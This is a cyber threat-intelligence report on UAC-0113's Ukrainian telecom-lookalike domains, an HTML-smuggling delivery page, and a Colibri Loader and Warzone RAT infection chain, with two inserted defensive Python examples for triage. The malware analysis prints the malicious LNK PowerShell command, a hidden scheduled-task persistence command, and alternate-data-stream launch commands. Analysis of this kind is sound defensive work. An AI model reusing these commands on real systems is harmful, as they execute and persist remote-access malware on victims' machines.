#### CYBER THREAT ANALYSIS

**RUSSIA**

By Insikt Group® September 19, 2022

# Russia-Nexus UAC-0113 Emulating Telecommunication

_This report profiles the unique infrastructure used by the threat activity group UAC-0113, which is linked with moderate confidence by CERT-UA to Sandworm. The activity was identified through a combination of large-scale automated network traffic analytics and analysis derived from open source reporting. The report will be of most interest to individuals engaged in strategic and operational intelligence relating to the activities of the Russian government in cyberspace and network defenders._

##### Key Judgments

- Insikt Group has identified new infrastructure used by UAC-0113, a group linked with medium confidence to Sandworm by CERT-UA. Sandworm is a Russian advanced persistent threat (APT) group affiliated with the Main Intelligence Directorate/Main Directorate (GRU/GU) of the General Staff of the Armed Forces of the Russian Federation.
- Identified staging infrastructure continues the trend of masquerading as telecommunication providers operating within Ukraine and delivers malicious payloads via an HTML smuggling technique that deploys Colibri Loader and Warzone RAT malware.
- Though the intent of the observed decoy document found in connection with this activity is not fully known, it is likely to be deployed against Ukraine-based targets in support of military action in the region, similar to previous UAC-0113 lures.
- A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113's broadening but continuing use of publicly available commodity malware.

##### Executive Summary

Recorded Future continues to monitor cyber espionage operations targeting government and private sector organizations across multiple geographic regions, including Ukraine. From August 2022, Recorded Future observed a steady rise in command and control (C2) infrastructure used by the threat activity group tracked by the Computer Emergency Response Team of Ukraine (CERT-UA) as UAC-0113. UAC-0113 has been linked by CERT-UA to the Russian advanced persistent threat (APT) group Sandworm. This report highlights trends observed by Insikt Group while monitoring UAC-0113 infrastructure, including the recurring use of dynamic DNS domains masquerading as telecommunication providers operating in Ukraine, which shows that the group's efforts to target entities in Ukraine remain ongoing. Domain masquerades can enable spearphishing campaigns or redirects that pose a threat to victim networks.

Using a combination of proactive adversary infrastructure detections and domain analysis techniques, Insikt Group determined that UAC-0113's use of this newly discovered infrastructure overlaps with other infrastructure tactics, techniques, and procedures (TTPs) previously attributed to the group by CERT-UA. The information and TTPs provided in this report enable defenders to better search for and protect against activity by UAC-0113.

**Background**

On June 24, 2022, a [report by CERT-UA detailed the use](https://cert.gov.ua/article/405538) of the DarkCrystal remote access trojan (RAT) by UAC-0113, a group CERT-UA has indicated as being linked to Sandworm, a Russian Main Intelligence Directorate/Main Directorate (GRU/GU) related threat group. The CERT-UA report indicated that UAC-0113 was employing a malicious lure document which deployed DarkCrystal RAT. This activity likely targeted entities in Ukraine, specifically individuals or entities seeking information about Ukrainian military service personnel in relation to matters of legal assistance. Although the theme of this lure document was focused on military personnel legal matters, CERT-UA noted that the attack was also likely targeted at telecommunications providers of Ukraine.

DarkCrystal RAT is a commodity malware dating back to at least 2018; a sample of the malware was [posted to Hybrid Analysis](https://www.hybrid-analysis.com/sample/7dcac4429dfe2a570ac33661cf6c48109780db6da9431721141ba47e6d27f710?environmentId=100) in November of that same year. Since its initial discovery, [reporting indicates that it has been offered for sale](https://cybersecuritynews.com/darkcrystal-rat/) in underground forums, likely making it a tool of interest to a wide range of threat actor groups, including those entities seeking an infostealer that can hinder attribution efforts by government or security professionals.

Analysis of infrastructure linked to UAC-0113 uncovered a newly identified malicious ISO file (SHA256: [1c6643b479614340097a8071c9f880688af5a82db7b6e755beafe7301eea1abf](https://tria.ge/220916-nvj7wafff5)) as part of an HTML smuggling technique. The ISO file contained a lure document, written in Ukrainian, that masquerades as a request for discounts on fuel for citizens of the Oleksandrivka Raion (district), an area in Donetsk. Additionally, the ISO file delivers an executable that deploys both Colibri Loader and Warzone RAT to the target machine.

Colibri Loader, first reported by Insikt Group in August 2021, is a commodity malware leased on XSS Forum by the user "c0d3r_0f_shr0d13ng3r". It is written in assembly and C to target Windows operating systems without any dependencies.
On March 11, 2022, Cloudsek researchers [described Colibri Loader as "a type of malware that is used to load more types of malware into the infected system"](https://cloudsek.com/in-depth-technical-analysis-of-colibri-loader-malware/) which has "multiple techniques that help avoid detection". On April 5, 2022, Malwarebytes researchers [also reported on the operations of the Colibri Loader and further detailed its functionality](https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/), including its ability to "deliver and manage payloads onto infected computers".

Warzone RAT (also known as Ave Maria Stealer) is a popular commodity remote access tool (RAT) that has been in active development since 2018. It is sold on underground forums and on the developer's website, warzone[.]ws. The malware is advertised as a full-featured RAT developed in C/C++ that claims to be "easy to use and highly reliable."

##### Threat and Technical Analysis

Insikt Group used intelligence provided by CERT-UA to discover further infrastructure linked to UAC-0113. The information uncovered suggests that it is highly likely that this threat group is continuing to masquerade as telecommunication providers operating within Ukraine. While monitoring the infrastructure, Insikt Group observed a malicious ISO file embedded in the HTML code, suggesting that the domains and related IP addresses have likely already been, or are soon to become, operationalized.

###### Infrastructure

A domain noted in CERT-UA's June [report on UAC-0113](https://cert.gov.ua/article/405538), datagroup[.]ddns[.]net, was likely masquerading as the Ukrainian telecommunications company Datagroup.
This domain resolved to the IP address 31[.]7[.]58[.]82, which also [hosted a further domain](https://www.virustotal.com/gui/ip-address/31.7.58.82/relations), kyiv-star[.]ddns[.]net, likely masquerading as the Ukrainian telecommunications company Kyivstar. Analysis of these domains and their related shared IP address [revealed a ZeroSSL TLS certificate hosted on port 443](https://crt.sh/?id=6932000932) with the Subject Common Name datagroup[.]ddns[.]net. No [certificate](https://crt.sh/?q=kyiv-star.ddns.net) for kyiv-star[.]ddns[.]net was found. The server banner for IP address 31[.]7[.]58[.]82 is detailed below in Figure 2.

_Figure 1: Maltego chart illustrating the links between previously reported infrastructure and the newly described infrastructure and activity in this reporting. See Appendix B_

```
HTTP/1.1 200 OK
Date: Mon, 27 Jun 2022 03:17:00 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 14 Jun 2022 09:52:56 GMT
ETag: "0-5e1655e7b5c32"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html
```

_Figure 2: Server Banner of the IP Address 31[.]7[.]58[.]82 (Source: Shodan.io)_

_Figure 3: ett[.]ddns[.]net certificate registration event (Source: Recorded Future)_

_[Figure 4: July 16, 2022, server banner and HTML from scan of the IP address 103[.]150[.]187[.]121 on port 4443 (Source: SecurityTrails)](https://securitytrails.com/app/sb/ip/103.150.187.121/ports)_

_Figure 5: darkett[.]ddns[.]net certificate registration event (Source: Recorded Future)_

###### ett[.]ddns[.]net

Insikt Group identified a further domain likely linked to UAC-0113, ett[.]ddns[.]net, hosted between July 7 and 15, 2022, on IP address 103[.]150[.]187[.]121. The domain ett[.]ddns[.]net is likely a spoof of the legitimate domain for EuroTransTelecom LLC, ett[.]ua, a Ukrainian telecommunications operator.
This new infrastructure has several overlaps with the infrastructure noted in the CERT-UA reports, such as the use of the dynamic DNS provider No-IP with a domain masquerading as a telecommunications provider operating in Ukraine, the use of a TLS certificate from a free TLS certificate provider, and a server banner that shares similarities with the banner seen on IP address 31[.]7[.]58[.]82, shown above in Figure 2.

###### darkett[.]ddns[.]net

In addition to the ett[.]ddns[.]net domain, SecurityTrails banner [data identifies a similarly named domain, darkett[.]ddns[.]net](https://securitytrails.com/app/sb/ip/103.150.187.121/ports), hosted on the same IP address, 103[.]150[.]187[.]121, as ett[.]ddns[.]net. The domain darkett[.]ddns[.]net also uses a TLS [certificate provided by ZeroSSL](https://crt.sh/?id=7128307553), similar to the previously observed domain datagroup[.]ddns[.]net. Further analysis of the domain darkett[.]ddns[.]net revealed that between July 15 and 16, 2022, the domain was also hosted on IP address 94[.]153[.]171[.]42. Historical DNS for IP address 94[.]153[.]171[.]42 also lists a resolution for the domain kievstar[.]online on July 12, 2022.

###### kievstar[.]online

On July 12, 2022, the domain kievstar[.]online moved from IP address 94[.]153[.]171[.]42 to multiple content delivery network (CDN) IP addresses hosted by Cloudflare. Further analysis of the domain kievstar[.]online details a Let's Encrypt TLS [certificate](https://crt.sh/?id=7113878052) that was created on July 12, 2022.

###### 103[.]150[.]187[.]121, ett[.]hopto[.]org and star-link[.]ddns[.]net

On August 1, 2022, SecurityTrails identified further updates to the IP address 103[.]150[.]187[.]121, listing a new TLS [certificate for the domain ett[.]hopto[.]org](https://crt.sh/?id=7115444279). This TLS certificate is also provided by ZeroSSL and was created on July 13, 2022. On July 13, 2022, the domain ett[.]hopto[.]org resolved to the IP address 217[.]77[.]221[.]199.
Further analysis of this IP address also details the resolution of the domain star-link[.]ddns[.]net on August 15, 2022, again likely spoofing a telecommunications company, Starlink (operated by the American manufacturer SpaceX), [which is reportedly assisting Ukraine in the conflict with Russia](https://www.wired.com/story/starlink-ukraine-internet/).

```
…
"issuer": {
  "common_name": "ZeroSSL RSA Domain Secure Site CA",
  "country_name": "AT",
  "distinguished_name": "Common Name: ZeroSSL RSA Domain Secure Site CA, Organization: ZeroSSL, Country: AT",
  "organization_name": "ZeroSSL"
}
…
"subject": {
  "common_name": "ett.hopto[.]org",
  "distinguished_name": "Common Name: ett.hopto[.]org"
}
…
"validity": {
  "not_after": "2022-10-11T23:59:59+00:00",
  "not_before": "2022-07-13T00:00:00+00:00"
}
…
"server_info": {
  "highest_ssl_version_supported": "TLSv1.2",
  "hostname": "103[.]150[.]187[.]121",
  "ip_address": "103[.]150[.]187[.]121",
  "openssl_cipher_string_supported": "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
  "port": 443
}
…
```

_[Figure 6: JSON excerpts from August 1, 2022, scan of the IP address 103[.]150[.]187[.]121 on port 443 (Source: SecurityTrails)](https://securitytrails.com/app/sb/ip/103.150.187.121/ports)_

###### star-cz[.]ddns[.]net

Analysis of the domain star-cz[.]ddns[.]net, [reported by CERT-UA on June 10, 2022](https://cert.gov.ua/article/160530), shows a resolution to the IP address 103[.]27[.]202[.]127. A further domain, kyivstar[.]online, was also found to resolve to this same IP address, and the use of this domain continues the theme of emulating telecommunication providers in Ukraine.
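The domains in this section share one pattern: a Ukrainian telecom brand (sometimes hyphenated, prefixed, or spelled the Russian way) parked under a No-IP dynamic DNS suffix or a non-Ukrainian TLD. The Python below is an added example, not Recorded Future's or CERT-UA's tooling; it scores candidate domains against a brand watchlist and flags dynamic-DNS hosting, which is the kind of check a brand-monitoring pipeline would run. The watchlist `BRANDS`, the `LEGITIMATE` set, and the scoring weights are assumptions for the demonstration; the candidate domains are the report's own defanged indicators.

```python
"""Score candidate domains for brand lookalikes and dynamic-DNS hosting.

Added example; not Recorded Future's or CERT-UA's code. BRANDS, LEGITIMATE and the
scoring are assumptions for the demonstration; the candidates in __main__ are the
report's own defanged indicators.
"""
import re
import unicodedata

# Assumed watchlist: normalized brand tokens the report says were imitated.
BRANDS = {
    "kyivstar": ("kyivstar", "kievstar"),   # "kievstar" is the Russian-style spelling noted in the report
    "datagroup": ("datagroup",),
    "ett.ua": ("ett",),                     # EuroTransTelecom LLC; a 3-letter token is noisy, see matched_brand
    "starlink": ("starlink",),
}
# Assumed legitimate domains that must never be flagged.
LEGITIMATE = {"kyivstar.ua", "datagroup.ua", "ett.ua", "starlink.com"}
# No-IP dynamic DNS suffixes used by the infrastructure described in the report.
DYNDNS_SUFFIXES = (".ddns.net", ".hopto.org")


def refang(domain: str) -> str:
    """'kyiv-star[.]ddns[.]net' -> 'kyiv-star.ddns.net'."""
    return domain.replace("[.]", ".").strip().strip(".").lower()


def registrable_label(domain: str) -> str:
    """The label the actor chose: left of a dynamic-DNS suffix, else the second-level label."""
    parts = domain.split(".")
    if domain.endswith(DYNDNS_SUFFIXES) and len(parts) >= 3:
        return parts[-3]
    return parts[-2] if len(parts) >= 2 else domain


def normalize(label: str) -> str:
    """Collapse separators and common digit-for-letter swaps so 'kyiv-star' compares as 'kyivstar'."""
    label = unicodedata.normalize("NFKC", label).lower()
    label = re.sub(r"[-_.]", "", label)
    return label.translate(str.maketrans("01", "ol"))


def matched_brand(label: str):
    """Return (brand, 'exact'|'affix') or None; 'affix' allows up to 4 extra chars ('darkett')."""
    norm = normalize(label)
    for brand, tokens in BRANDS.items():
        for tok in tokens:
            if norm == tok:
                return brand, "exact"
            if tok in norm and len(norm) - len(tok) <= 4:
                return brand, "affix"
    return None


def assess(candidate: str) -> dict:
    """Score a domain: 2 for an exact brand match, 1 for an affixed one, +1 for dynamic-DNS hosting."""
    domain = refang(candidate)
    if domain in LEGITIMATE:
        return {"domain": domain, "brand": None, "match": None, "dyndns": False, "score": 0}
    hit = matched_brand(registrable_label(domain))
    dyndns = domain.endswith(DYNDNS_SUFFIXES)
    score = (2 if hit and hit[1] == "exact" else 1 if hit else 0) + (1 if dyndns else 0)
    return {"domain": domain, "brand": hit[0] if hit else None,
            "match": hit[1] if hit else None, "dyndns": dyndns, "score": score}


if __name__ == "__main__":
    for c in ("kyiv-star[.]ddns[.]net", "darkett[.]ddns[.]net", "kievstar[.]online",
              "star-link[.]ddns[.]net", "star-cz[.]ddns[.]net", "ett[.]ua"):
        print(assess(c))
```

A score of 3 (exact brand plus dynamic DNS) is what kyiv-star[.]ddns[.]net and datagroup[.]ddns[.]net produce; star-cz[.]ddns[.]net scores only 1 because no brand token matches, which mirrors the report's weaker, theme-based link for that domain.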
The aforementioned use of the similar domain kievstar[.]online is of note, as this spelling is not typically [employed in Ukraine but has been employed previously by the international community](https://www.cbc.ca/news/world/cbc-pronunciation-kyiv-ukraine-crisis-explainer-1.6371766), as well as historically during Soviet times, and has now been carried into Russian domestic colloquial use.

##### Domain to IP Address Resolutions Timeline

###### HTML Analysis[^1]

The domains ett[.]ddns[.]net, star-link[.]ddns[.]net, and kievstar[.]online, and the IP addresses 103[.]150[.]187[.]121 and 217[.]77[.]221[.]199, have all hosted, at various times, the same web page. The web page features the Ukrainian-language text "ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ", which translates as "Odesa Regional Military Administration", along with "File is downloaded automatically" in English, as shown in Figure 9 below.

**_Figure 9: Screenshot of 103[.]150[.]187[.]121 (Source: URLScan)_**

Contained within the HTML of the web page is a Base64-encoded [ISO file that is deployed via the HTML smuggling technique](https://tria.ge/220916-nvj7wafff5). This ISO file is set to auto-download when the website is visited. Figure 10 below shows the HTML content of the file.

[^1]: As part of the ongoing tracking of UAC-0113 activity, Insikt Group has identified that as of September 5, 2022, the staging servers kievstar[.]online and IP address 103[.]150[.]187[.]121 have been updated and are now serving new malicious lure files via HTML smuggling. The newly identified lure files masquerade as a "password leak" and deliver Eternity Stealer malware.

**_Figure 10: The HTML content for the IP address 103[.]150[.]187[.]121 (with Base64-encoded data removed), August 8, 2022 (Source: URLScan)_**

Insikt Group inspected the web page's HTML and identified embedded JavaScript, which assists in the malicious ISO delivery behavior of the page.
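To triage a page like the one in Figure 10, an analyst wants to pull the smuggled payload out of the HTML and confirm what it is before detonating anything. The Python below is an added example, not code from the report or from URLScan; it recovers payloads stored the two ways this section goes on to discuss: a Base64 string assigned to a JavaScript variable (decoded directly, because the character-subtraction loop the report describes leaves the string unchanged) and an array of decimal values that a loop shifts by a constant. It then checks the result for the ISO 9660 "CD001" identifier and hashes it. The HTML documents, the variable names `binary` and `d`, and the stand-in ISO image are all constructed for the example.

```python
"""Recover and triage HTML-smuggled payloads.

Added example, not the report's or URLScan's code. SAMPLE_ISO is a constructed stand-in for
an ISO image (only the 'CD001' identifier is populated); the two HTML documents are constructed
to mirror the two variants the report discusses, using the variable names it mentions.
"""
import base64
import hashlib
import re

ISO_MAGIC = b"CD001"        # ISO 9660 primary volume descriptor identifier
ISO_MAGIC_OFFSET = 0x8001   # sector 16 (32768) plus the one-byte descriptor type


def _build_sample_iso() -> bytes:
    buf = bytearray(ISO_MAGIC_OFFSET + len(ISO_MAGIC) + 16)
    buf[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + len(ISO_MAGIC)] = ISO_MAGIC
    return bytes(buf)


SAMPLE_ISO = _build_sample_iso()
SHIFT = 17  # the constant the APT29-style loop subtracts from each array element

# Variant 1 (UAC-0113 style): Base64 string in a JS variable. The report notes the
# character-subtraction loop on such a string is a no-op, so plain decoding is correct.
SAMPLE_HTML_BASE64 = (
    "<html><body>File is downloaded automatically<script>\n"
    "var binary = '" + base64.b64encode(SAMPLE_ISO).decode() + "';\n"
    "for (var i = 0; i < binary.length; i++) { binary[i] = binary[i] - 11; }\n"
    "var a = document.createElement('a'); a.download = 'payload.iso';\n"
    "</script></body></html>"
)
# Variant 2 (APT29 style): decimal array shifted by a constant that the loop removes.
SAMPLE_HTML_ARRAY = (
    "<html><body><script>\n"
    "var d = [" + ",".join(str(b + SHIFT) for b in SAMPLE_ISO) + "];\n"
    "for (var i = 0; i < d.length; i++) { d[i] = d[i] - " + str(SHIFT) + "; }\n"
    "</script></body></html>"
)


def extract_base64_payloads(html: str) -> list:
    """Decode every long Base64 literal assigned inside the page."""
    found = []
    for m in re.finditer(r"=\s*['\"]([A-Za-z0-9+/=\s]{64,})['\"]", html):
        try:
            found.append(base64.b64decode(re.sub(r"\s", "", m.group(1)), validate=True))
        except ValueError:
            continue  # a long plain-text string that is not valid Base64
    return found


def extract_shifted_array_payloads(html: str) -> list:
    """Find 'var X = [n, n, ...]', look for 'X[i] = X[i] - K' and undo the shift."""
    found = []
    for m in re.finditer(r"var\s+(\w+)\s*=\s*\[([\d,\s]+)\]", html):
        name, body = m.group(1), m.group(2)
        loop = re.search(re.escape(name) + r"\[i\]\s*=\s*" + re.escape(name) + r"\[i\]\s*-\s*(\d+)", html)
        shift = int(loop.group(1)) if loop else 0
        values = [int(v) - shift for v in body.split(",") if v.strip()]
        if values and all(0 <= v <= 255 for v in values):
            found.append(bytes(values))
    return found


def triage(html: str) -> list:
    """Return size, ISO check and SHA-256 for every payload recovered from the page."""
    results = []
    for payload in extract_base64_payloads(html) + extract_shifted_array_payloads(html):
        results.append({
            "size": len(payload),
            "is_iso": payload[ISO_MAGIC_OFFSET:ISO_MAGIC_OFFSET + len(ISO_MAGIC)] == ISO_MAGIC,
            "sha256": hashlib.sha256(payload).hexdigest(),
        })
    return results


def sample_sha256() -> str:
    """Hash of the constructed image, for comparison with what triage() recovers."""
    return hashlib.sha256(SAMPLE_ISO).hexdigest()


if __name__ == "__main__":
    for label, html in (("base64", SAMPLE_HTML_BASE64), ("array", SAMPLE_HTML_ARRAY)):
        print(label, triage(html))
```

Both variants decode to the same bytes, so the SHA-256 matches across them; on a real page the hash is what you would pivot on in a sandbox such as the Hatching Triage entry the report links.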
Testing the functionality of the for loop on lines 26 to 28 shows that it does not change the Base64-encoded data held in the variable "binary". The for loop attempts to subtract the integer value 11 from each of the characters that make up the Base64 string. JavaScript will produce an error when attempting to subtract an integer from a char, resulting in its value not being updated. The Base64 contents of the variable "binary" will be exactly the same after going through the for loop, making it redundant, and the Base64 data will still correctly decode to an ISO file. The inclusion of this routine by UAC-0113 could be due to operator error, as it serves no purpose: strings are immutable objects in JavaScript.

[Of note, a report by Palo Alto's Unit42 details a similar HTML smuggling routine](https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/) used by APT29 in a separate campaign to download an ISO file, shown below in Figure 11. APT29's original use of this routine was for a binary array, which helps to potentially illuminate the original purpose of UAC-0113's redundant for loop. APT29's HTML and JavaScript code has similar overlaps with the UAC-0113-linked sample shown in Figure 10 above.

_[Figure 11: Screenshot of HTML content, used by APT29, from hXXps://porodicno[.]ba/wp-content/Agenda[.]html (with the array of decimal values of the obfuscated payload abbreviated with the use of "......") (Source: URLScan)](https://urlscan.io/result/5ebffdb2-792b-45fd-87c1-78f075200272/dom/)_

APT29's correctly functioning for loop routine can be seen on lines 11-13 in Figure 11 above and is further detailed in Figure 12 below; it subtracts the integer 17 from each of the decimal values in the variable "d", which deobfuscates the malicious ISO payload. Further comparison of the two routines highlights some cosmetic changes, possibly to frustrate security researchers and hinder signaturing of these functions.
**_[Figure 12: Screenshot of the for loop used by APT29 in hXXps://porodicno[.]ba/wp-content/Agenda[.]html (Source: URLScan)](https://urlscan.io/result/5ebffdb2-792b-45fd-87c1-78f075200272/dom/)_**

**_Figure 13: Screenshot of the for loop used by UAC-0113 in 103[.]150[.]187[.]121 (Source: URLScan)_**

It is currently unknown why the two threat actor groups' ISO delivery functionality overlaps; one hypothesis is that UAC-0113 took inspiration from, or directly copied, this functionality from open source reporting on APT29, or that the same open source resource was used as a codebase.

###### Malware Analysis

An analysis of the UAC-0113 ISO file and its content was conducted by Insikt Group and is detailed in the following sections.

###### 3_ЗАЯВА-на-отримання-компенсації.iso

A Base64-encoded ISO file, titled "3_ЗАЯВА-на-отримання-компенсації.iso" (SHA256: [1c6643b479614340097a8071c9f880688af5a82db7b6e755beafe7301eea1abf](https://tria.ge/220916-nvj7wafff5)), was found within the HTML of IP address 103[.]150[.]187[.]121. The ISO file was created on August 5, 2022; its title translates from Ukrainian as "3_APPLICATION-for-receiving-compensation". The ISO file contains a folder titled "ЗАЯВА" and 3 files, as shown in Table 1 below.
|Filename|Translation|SHA256|
|---|---|---|
|jfilyg7.exe|N/A|722c36abd195cce70ee25b48d6e64873262e046eae7433976120a1496f01487d|
|ЗАЯВА-на-отримання-компенсації.lnk|APPLICATION-for-receiving-compensation.lnk|bc4cab14e4b378a7b98185367b4778f92eb4335faba1a4503f4cfb7aba8f13e7|
|ЗАЯВА/3_ЗАЯВА-на-отримання-компенсації-додаткової-знижки-сімям-загиблих2.doc|APPLICATION/3_APPLICATION-for-receiving-compensation-additional-discount-for-the-families-of-the-deceased2.doc|a5a20063c8699c66f5292ed1da7c860360baf6cf2a52f33c2c0b8873a995397c|

_Table 1: File content information and translations for 3_ЗАЯВА-на-отримання-компенсації.iso (Source: Recorded Future)_

The directory "ЗАЯВА" and the "jfilyg7.exe" file were both configured as hidden, and would not normally be visible to the victim by default.

###### ЗАЯВА-на-отримання-компенсації.lnk

The malicious shortcut (LNK) file is visible by default to the victim and is used to initiate a malicious PowerShell script. The LNK file is configured to use a Windows folder icon, as shown in Figure 15 below, likely in an attempt to masquerade as a legitimate folder. The shortcut file contains the comment "WORKED3", possibly indicating that this is the third attempt to create the malicious payload.

**_Figure 15: Screenshot of the properties tab for the LNK file ЗАЯВА-на-отримання-компенсації.lnk (Source: Recorded Future)_**

The target of the shortcut is powershell.exe, which is executed with a small script provided as a command line argument via the Command option. The PowerShell script, shown in Figure 16 below, determines the drive letter that the ISO file is mounted on by iterating over each of the system's available drives, looking for hidden files located in the root of the filesystem with a filename containing the string "jfilyg7". Once the drive letter is identified, it opens the "ЗАЯВА" folder using the Invoke-Item cmdlet and executes "jfilyg7.exe" using the Start-Process cmdlet.
```
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command $f = 'jfilyg7';Foreach($d in Get-PSDrive|ForEach-Object{$PSItem.Root} | findstr ':\') {$w=gci -hidden $d | findstr $f;if($w.Contains($f)){break}};ii $d'ЗАЯВА';start($d+$f)
```

_Figure 16: Target of the ЗАЯВА-на-отримання-компенсації.lnk shortcut file (Source: Recorded Future)_

###### jfilyg7.exe

The main payload, jfilyg7.exe, is an instance of Colibri Loader used to deliver Warzone RAT to the victim's system. The loader communicates[^2] with its command-and-control (C2) server over HTTP using a combination of RC4 encryption and Base64 encoding, and is capable of downloading new payloads to execute and removing itself from victim systems. Figure 17, shown below, provides an overview of the actions performed by each malware. Upon execution, jfilyg7.exe decrypts 2 embedded portable executable (PE) file payloads. The first PE file is a copy of Colibri Loader that is written to "C:\ProgramData\conhost.exe" and executed. The second PE file is a copy of Warzone RAT that is injected into a spawned copy of jfilyg7.exe via process hollowing.

[^2]: https[:]//fr3d[.]hk/blog/colibri-loader-back-to-basics

_Figure 17: Overview of Colibri Loader and Warzone RAT execution (Source: Recorded Future)_

###### Colibri Loader

Colibri Loader's conhost.exe process follows a similar pattern to jfilyg7.exe, as shown in Figure 18 below. It decrypts a PE file payload, spawns a copy of itself, and then uses process hollowing to execute the payload. The injected payload is another instance of Colibri Loader that is used to communicate with its C2 server and establish persistence on the victim machine. For persistence, Colibri Loader drops a copy of itself in the "%APPDATA%\Local\Microsoft\WindowsApps" folder as GetVariable.exe. It then creates the seemingly benign-looking scheduled task shown in Figure 19 to execute a hidden instance of PowerShell.

```
schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"
```

_Figure 19: Scheduled task used by Colibri Loader for persistence (Source: Recorded Future)_

_Figure 18: conhost.exe payload decryption and process injection (Source: Recorded Future)_

When run, the scheduled task takes advantage of a search order hijacking vulnerability in PowerShell [identified by Malwarebytes in April 2022](https://www.malwarebytes.com/blog/news/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique). The Get-Variable cmdlet is used as part of PowerShell's initialization; however, PowerShell searches for the cmdlet using the default path (containing the WindowsApps directory) first, and therefore executes the Colibri payload instead of the legitimate Get-Variable cmdlet.

Finally, the Colibri Loader process begins communication with its C2. To do this, it generates a UID[^3] based on the victim machine's serial number and sends it via a "check" command to the C2. Once the C2 responds, it follows up with an "update" command to provide the C2 with information about the victim machine. It then sends a "ping" command that is used to check for further instructions from the C2, such as downloading a new payload or cleaning up an infected system.

A full configuration extraction of the Colibri Loader sample is provided below in Table 2. It shows that the Colibri Loader is version 1.2.0, the botnet identifier is "Build1", and 2 C2 addresses are provided.

|Item|Value|
|---|---|
|Version|1.2.0|
|Botnet|Build1|
|C2 Addresses|hXXp://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj[.]cc/gate.php|
||hXXp://yugyuvyugguitgyuigtfyutdtoghghbbgyv[.]cx/gate.php|

_Table 2: Extracted Colibri Loader configuration (Source: Recorded Future)_

###### Warzone RAT

The Warzone RAT payload also establishes persistence on the victim machine. It employs 2 methods: a batch file placed in the user's Startup folder and a registry run key.
Warzone RAT drops a copy of itself in the "ApplicationData" [alternate data stream (ADS)](https://www.malwarebytes.com/blog/news/2015/07/introduction-to-alternate-data-streams) of a file named "Documents" located in the user's Documents folder. A batch file named "programs.bat" is also created and placed in the user's "%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" folder. This file contains commands to loop through another ADS, named "start", stored in the "programs.bat" file, and executes each line within the stream. The "programs.bat:start" ADS contains a wmic command to create a process from the Documents:ApplicationData ADS. The full contents of the programs.bat file and its start ADS are provided in Figures 20 and 21.

```
for /F "usebackq tokens=*" %%A in ("C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start") do %%A
```

_Figure 20: Contents of Warzone RAT's programs.bat file (Source: Recorded Future)_

```
wmic process call create '"C:\Users\\Documents\Documents:ApplicationData"'
```

_Figure 21: Contents of Warzone RAT's programs.bat:start ADS (Source: Recorded Future)_

For the other persistence method, Warzone RAT drops a copy of itself in the user's Documents folder as MSCommonDriver.exe and sets the registry run key shown below to the dropped file's path. The file name MSCommonDriver.exe has also previously [been used by UAC-0113 during their deployment of DarkCrystal RAT](https://cert.gov.ua/article/405538).

```
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSCommonDriver
```

_Figure 22: Warzone RAT's registry run key used for persistence (Source: Recorded Future)_

MSCommonDriver.exe is also executed and then begins communicating with the Warzone RAT C2 located at darkfox[.]ddns[.]net on port 443.

|Domain|Port|
|---|---|
|darkfox[.]ddns[.]net|443|
|darksea[.]ddns[.]net|443|

_Table 3: Extracted Warzone C2 configuration (Source: Recorded Future)_

###### ЗАЯВА/3_ЗАЯВА-на-отримання-компенсації-додаткової-знижки-сімям-загиблих2.doc

A decoy document, titled "3_ЗАЯВА-на-отримання-компенсації-додаткової-знижки-сімям-загиблих2.doc", found inside the folder "ЗАЯВА", is shown in Figure 23. The document is opened via the commands executed by the aforementioned LNK file ЗАЯВА-на-отримання-компенсації.lnk. The folder and document translate from Ukrainian to English as "APPLICATION" and "3_APPLICATION-for-receiving-compensation-additional-discount-for-the-families-of-the-deceased2.doc", respectively. The document itself does not engage in malicious activity but is used to hide the operations undertaken by the malicious LNK file. The Ukrainian-language text details that the document is an application for citizens to request discounts on fuel from the head of the Zaporozhye Regional Department for Social Protection in the Oleksandrivka Raion (district), an area in Donetsk.

###### Colibri Loader and Warzone RAT C2 Analysis

**Colibri Loader C2 Servers**

Network analysis of the Colibri Loader sample reveals communication to 2 distinct domains: yugyuvyugguitgyuigtfyutdtoghghbbgyv[.]cx, which as of August 1, 2022, resolves to IP address 65[.]108[.]213[.]210, and zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj[.]cc, which between June 28, 2022, and July 28, 2022, also resolved to the aforementioned IP address 65[.]108[.]213[.]210. As of July 28, 2022, zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj[.]cc resolves to a CDN IP address hosted by Cloudflare. Insikt Group is unable to definitively state whether UAC-0113 is the sole owner or operator of these C2 domains, or whether they are owned or controlled by the threat actors or authors behind Colibri themselves.
Searches within Hatching Triage's public sandbox revealed [30 distinct uploaded samples that have also communicated with both of these Colibri Loader C2 domains](https://tria.ge/s?q=domain%3Azpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc+AND+domain%3Ayugyuvyugguitgyuigtfyutdtoghghbbgyv.cx+&offset=2022-08-10T10%3A54%3A14.661298939Z&limit=50&button=), with the earliest sample submitted on July 4, 2022. Within the 30 samples, there are also references to a range of other malware, including:

- Raccoon Stealer
- RedLine Stealer
- Socelars
- Nymaim
- PrivateLoader
- Dark Crystal RAT
- Djvu Ransomware
- Vidar Stealer

###### Warzone RAT C2 Server

Network analysis of the Warzone RAT sample deployed by the file "jfilyg7.exe" revealed communication to 2 C2 domains: darkfox[.]ddns[.]net, which resolves to IP address 94[.]158[.]156[.]4 and is listed as being hosted in the city of Odesa, Ukraine, and darksea[.]ddns[.]net, which resolves to IP address 91[.]200[.]114[.]141 and is listed as being hosted in Lviv, Ukraine.

